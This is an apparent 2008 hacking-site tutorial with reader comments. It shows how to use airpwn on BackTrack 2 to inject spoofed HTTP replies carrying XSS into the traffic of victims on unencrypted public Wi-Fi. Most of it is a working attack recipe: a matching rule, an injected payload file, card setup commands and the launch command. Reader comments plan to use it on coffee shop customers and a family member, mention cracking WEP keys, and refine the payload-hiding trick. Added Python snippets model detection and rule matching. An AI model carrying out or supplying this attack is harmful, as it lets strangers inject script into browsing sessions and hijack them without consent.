If I asked how many of you have ever used a public hotspot, whether at the airport, a coffee shop, a store, or anywhere else, the vast majority of you would probably answer yes. Of course, we all know how unsafe these public wireless networks can be; so we know better than to read our email, enter our passwords, or give out any sensitive information. However, many people (even the most informed) still believe that casual surfing of the net on a public network is perfectly fine. Usually, they would respond with:
“If I’m not looking at something private, who cares if someone’s watching?”
The reality is that packet sniffing is no longer the only threat to public network users; packet injection tools like airpwn can make even casual browsing incredibly dangerous.
In this article, I will show you how airpwn can generate spoofed packets containing XSS payloads and what could potentially be done with them. Hopefully, this article will give you some insight into the huge dangers of using unencrypted public hotspots and will convince you to avoid them.
Disclaimer
I wrote this article purely as an educational illustration of what airpwn can do to users of an unencrypted public wireless network. Neither I, nor HackThisSite, shall be held responsible for any damages you cause based on the information in this article.
How Airpwn Works
Airpwn is a packet injection tool that monitors 802.11a/b/g networks and watches for outgoing request packets from a victim’s computer. It uses a regex-based, configurable filtering engine to find ‘matching’ request packets. Once it sees a matching request, airpwn injects spoofed reply packets back to the victim’s computer carrying the correct IP address and MAC address of the requested resource, along with whatever payload was specified. Since the attacker’s spoofed packets arrive faster than the packets from the requested resource (airpwn can respond in less than 1 ms, while average internet latency is about 50 ms), the victim’s computer accepts the injected packets and treats them as valid. When the real packets from the requested resource finally arrive, they are either dropped (if the real packet is shorter than the spoofed one) or appended to the spoofed packets (if the real packet is longer than the spoofed one).
With that said, the attacker could easily inject replacement pictures, HTML, client side scripting languages like Javascript, or any other XSS payload into the forged packets. This is where XSS and wireless network attacks cross paths, and as a result, XSS is given an entirely new meaning; each and every website visited suddenly becomes XSS vulnerable.
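One way a client-side monitor or a wireless IDS sensor can notice the race described above, as an added example that is not part of the article or of airpwn: two server-to-client TCP segments of the same flow that disagree on an overlapping sequence range. Flow tuples, sequence numbers and payloads below are constructed, and the function name find_injections is an assumption of this example.

```python
from collections import defaultdict

# Constructed server->client TCP segments modelling the race described above:
# the spoofed reply lands first, the genuine reply for the same request arrives
# later with the same sequence number but different bytes.  Addresses are from
# documentation ranges; payloads are made up for the example.
INJECTED = (b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n"
            b"<script>alert(1)</script><!--")
GENUINE = (b"HTTP/1.1 200 OK\r\nServer: example\r\nContent-Type: text/html\r\n\r\n"
           b"<html><body><p>Welcome to the hotspot portal</p>")
OK_SHORT = b"HTTP/1.1 200 OK\r\n\r\nok"
FLOW_A = ("203.0.113.10:80", "10.0.0.5:51234")   # (server, client)
FLOW_B = ("198.51.100.7:80", "10.0.0.5:51240")
SEGMENTS = [                                    # (flow, tcp seq, payload)
    (FLOW_A, 1000, INJECTED),                   # arrives first, client accepts it
    (FLOW_A, 1000, GENUINE),                    # real reply: same seq, other bytes
    (FLOW_B, 5000, OK_SHORT),
    (FLOW_B, 5000, OK_SHORT),                   # benign retransmission
    (FLOW_B, 5000 + len(OK_SHORT), b"ay"),      # in-order continuation
]

def find_injections(segments):
    """Return (flow, seq) for every segment whose bytes disagree with an
    earlier segment of the same flow on an overlapping sequence range.
    A real retransmission repeats identical bytes and is not flagged."""
    seen = defaultdict(list)                    # flow -> [(seq, payload)]
    alerts = []
    for flow, seq, payload in segments:
        for old_seq, old_payload in seen[flow]:
            start = max(seq, old_seq)
            end = min(seq + len(payload), old_seq + len(old_payload))
            if start >= end:
                continue                        # no overlap: ordinary data
            new_part = payload[start - seq:end - seq]
            old_part = old_payload[start - old_seq:end - old_seq]
            if new_part != old_part:
                alerts.append((flow, start))
                break                           # one alert per segment
        seen[flow].append((seq, payload))
    return alerts

if __name__ == "__main__":
    for flow, seq in find_injections(SEGMENTS):
        print(f"conflicting reply in {flow[0]} -> {flow[1]} at seq {seq}")
```

On a real capture the flow key is the TCP 4-tuple and the sequence numbers come straight from the TCP header; the signal is the content disagreement, so ordinary retransmissions stay quiet.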
Backtrack 2
Backtrack 2 is an excellent Slackware-based LiveCD that comes bundled with a variety of useful tools and software for security and penetration testing. Airpwn, the packet injection tool we will be using, is included on this LiveCD. You can get Backtrack 2 from http://www.remote-exploit.com. Once you have downloaded it, burn the Backtrack 2 image to a CD and boot from it. Depending on your computer, you may have to change your boot order. Once the LiveCD boots, you can use the username root and the password toor to log in.
The Attack
1. Go to the root directory of the airpwn program. On Backtrack 2, you can do this by running the command: cd /pentest/wireless/airpwn-*
2. Go the configuration directory by running: cd conf
3. Start up your favourite text editor (I prefer nano) and create a new file named xss_attack. In this file, type:
CODE :
begin xss_attack
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tiff|tif)
response content/xss_content
This is the configuration we will specify for airpwn’s internal filtering engine. The first line names the rule. The second line is a regular expression that a request packet must match to be accepted by airpwn (here, any GET or POST). The third line is another regular expression, for request packets that airpwn will ignore even though they matched the second line (here, GET requests for image files, which are left to the real server). The last line names the content file whose contents will be injected as the spoofed reply.
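A small model of how the filtering engine applies these four directives to request packets, added here as an example (not airpwn’s own code, and parse_conf / select_response are names chosen for this example). The conf text and the request lines are constructed; the rule is applied to the start of the request payload, as the ^ anchors in the conf assume.

```python
import re

# Constructed copy of the article's conf file; the dot before the extension is escaped, since a bare dot matches any character.
CONF_TEXT = r"""
begin xss_attack
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|tiff|tif)
response content/xss_content
"""

def parse_conf(text):
    """'begin' opens a rule, 'match'/'ignore' add regexes to it,
    'response' names the content file that rule sends back."""
    rules, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        directive, _, arg = line.partition(" ")
        if directive == "begin":
            current = {"name": arg, "match": [], "ignore": [], "response": None}
            rules.append(current)
        elif directive in ("match", "ignore"):
            current[directive].append(re.compile(arg))
        elif directive == "response":
            current["response"] = arg
    return rules

def select_response(rules, request):
    """Content file of the first rule whose match regex hits the request
    payload and whose ignore regexes all miss; None if no rule fires."""
    for rule in rules:
        hit = any(p.search(request) for p in rule["match"])
        skip = any(p.search(request) for p in rule["ignore"])
        if hit and not skip:
            return rule["response"]
    return None

# Constructed requests.  Note the image fetched through a query string: the
# ignore regex stops at '?', so that request would still get the spoofed reply.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n",
    "GET /images/logo.png HTTP/1.1\r\nHost: example.org\r\n\r\n",
    "POST /login HTTP/1.1\r\nHost: example.org\r\n\r\n",
    "GET /thumb?file=a.jpg HTTP/1.1\r\nHost: example.org\r\n\r\n",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req.split("\r\n")[0].ljust(40), select_response(parse_conf(CONF_TEXT), req))
```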
4. Go back to the root directory of the airpwn program by running: cd ..
5. Go to the content folder by running: cd content
6. Start up your favourite text editor again and create another new file named xss_content. In this file, type:
CODE :
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<html><body><script>alert('XSS')</script><!--
This file specifies the content that will be injected into each spoofed packet. It contains the headers that a web server would have sent back, a blank line that ends the headers, and the HTML to inject. In the above example, each page visited by the victim would produce a Javascript alert, and the rest of the code (the tail of the real reply, if it was appended) would be swallowed by the unclosed HTML comment.
7. Go back to the root directory of the airpwn program by running: cd ..
8. Run: ./madwifing_prep.sh to set up your 802.11a/b/g wireless network card.
9. Find the name of your wireless interface by running: iwconfig
10. Set the channel of your wireless card to the channel of the target wireless network. For example, if my wireless interface was ath0 and the channel of my target wireless network was 13, I would run: iwconfig ath0 channel 13
11. Enable your wireless interface by running: ifconfig ath0 up
12. Finally, start up airpwn by running: airpwn -c conf/xss_attack -i ath0 -d madwifi -vvv
The -c flag specifies the configuration file, the -i flag specifies the wireless interface, the -d flag specifies the driver (which should be madwifi if you used the madwifing_prep shell script), and the -vvv flag sets the verbosity.
Potential Attacks
Once you can successfully inject arbitrary content into your target wireless network, your capabilities become endless. You could insert invisible/visible IFRAMEs, cookie stealing code, history scanners, or ANY other XSS code you wish.
“With airpwn, you *are* the network…You are every web server out there” – Source: Airpwn Readme
Preventing These Attacks
The only real way to defend against this type of attack is to avoid unencrypted public wireless networks! If you absolutely must use a public network, ensure that ALL HTTP traffic goes over an encrypted tunnel (e.g. a VPN or an encrypted proxy).
Happy Hacking!
Great article, just one thing I want to add. For HTML responses you said to use an opening comment brace at the end in case the actual response is appended. The problem with this is that some browsers (such as IE) will use the first "-->" to end a comment, even if it is for another comment. Example:
<!-- This is a comment <!-- and so is this --> This is a comment in FF, but not IE --> This isn't a comment.
A better solution would probably be to end with <div style="visibility: hidden">, or something similar.
Thanks vh04x for the article, I've been reading it on and off during the day. I'm downloading Backtrack 2 and going to burn it to a CD. I've learned quite a bit, been googling and on Wikipedia, so thanks a lot for the knowledge. 10/10 from me
I love experimenting with my wireless on my laptop, I have a .txt file containing the WEPs of all my local wifi spots, aircrack-ptw is extremely handy when used with aircrack-ng, so I will be experimenting with this and will try out a few things on my mother while she is on the computer downstairs :D
This is absolutely lethal. O_O
Airpwn also supports WEP too, so you could crack a WEP key with aircrack and also do something similar on a "secure" network where people are even more likely to input sensitive data.
Now the only way to be safe is to change the SSID, never broadcast the SSID, use WPA, and set up MAC address filtering. :P
Sweet! I so want to try this at the new coffee shop in my neighborhood. I can just see customers' reaction when every page they visit displays scrolling text with the words: "j00 g0t 0wn3d!". You gotta love XSS. :)
Borders will never be the same again. Thank you for the read, 10/10.
Page Generated: Wed, 03 Dec 2008 20:15:23 -0500
I enjoyed this and was happy to accept it :)